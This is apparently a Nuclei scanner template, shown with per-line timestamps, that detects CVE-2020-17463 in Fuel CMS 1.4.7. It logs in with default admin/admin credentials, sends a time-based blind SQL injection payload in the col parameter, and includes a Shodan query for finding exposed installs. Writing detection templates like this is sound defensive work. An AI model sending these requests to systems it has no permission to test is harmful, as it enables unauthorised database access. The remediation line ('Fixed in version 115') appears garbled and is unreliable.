2023-07-16 07:35:32 +00:00
id : CVE-2020-17463
info :
2023-07-18 07:35:20 +00:00
name : Fuel CMS 1.4.7 - SQL Injection
2023-07-16 10:05:17 +00:00
author : Thirukrishnan
2023-08-31 11:46:18 +00:00
severity : critical
2023-07-16 07:35:32 +00:00
description : |
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
2023-09-06 12:22:36 +00:00
remediation : Fixed in version 115
2023-07-16 07:35:32 +00:00
reference :
- https://www.exploit-db.com/exploits/48741
2023-07-18 07:35:20 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-17463
- http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html
- https://getfuelcms.com/
2023-08-31 11:46:18 +00:00
- https://cwe.mitre.org/data/definitions/89.html
2023-07-16 07:35:32 +00:00
classification :
2023-08-31 11:46:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2023-07-18 07:35:20 +00:00
cvss-score : 9.8
2023-07-16 07:35:32 +00:00
cve-id : CVE-2020-17463
2023-07-18 07:35:20 +00:00
cwe-id : CWE-89
2023-11-16 10:31:49 +00:00
epss-score : 0.92663
2023-12-12 11:07:52 +00:00
epss-percentile : 0.9878
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*
2023-07-16 09:56:13 +00:00
metadata :
verified : true
2023-09-06 12:22:36 +00:00
max-request : 3
2023-08-31 11:46:18 +00:00
vendor : thedaylightstudio
product : fuel_cms
2023-09-06 12:22:36 +00:00
shodan-query : http.title:"fuel cms"
2023-12-05 09:50:33 +00:00
tags : packetstorm,cve,cve2020,sqli,fuel-cms,kev,thedaylightstudio
2023-07-16 07:35:32 +00:00
http :
- raw :
- |
2023-07-18 05:55:12 +00:00
GET /fuel/login/ HTTP/1.1
2023-07-16 07:35:32 +00:00
Host : {{Hostname}}
- |
2023-07-16 09:56:13 +00:00
POST /fuel/login/ HTTP/1.1
2023-07-16 07:35:32 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-07-16 15:31:00 +00:00
Referer : {{RootURL}}
2023-07-16 07:35:32 +00:00
2023-07-16 09:56:13 +00:00
user_name={{username}}&password={{password}}&Login=Login&forward=
2023-07-16 07:35:32 +00:00
- |
2023-07-16 09:56:13 +00:00
@timeout : 10s
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
2023-07-16 07:35:32 +00:00
Host : {{Hostname}}
X-Requested-With : XMLHttpRequest
2023-07-16 15:31:00 +00:00
Referer : {{RootURL}}
2023-07-16 09:56:13 +00:00
payloads :
username :
- admin
password :
- admin
attack : pitchfork
2023-07-16 07:35:32 +00:00
matchers :
- type : dsl
dsl :
2023-07-16 09:56:13 +00:00
- 'duration>=6'
2023-07-16 07:35:32 +00:00
- 'status_code_3 == 200'
2023-07-18 05:55:12 +00:00
- 'contains(body_1, "FUEL CMS")'
2023-07-16 07:35:32 +00:00
condition : and
2023-12-29 09:30:44 +00:00
# digest: 4b0a004830460221009af2af6464e551ab60c2fe8679d2ad95b7242217e445390c54bad7013afad3a702210095cd69e3070c16151b2017f5dc95c002fc386ed36d48a0b9e8c47de594915e4a:922c64590222798bb761d5b6d8e72950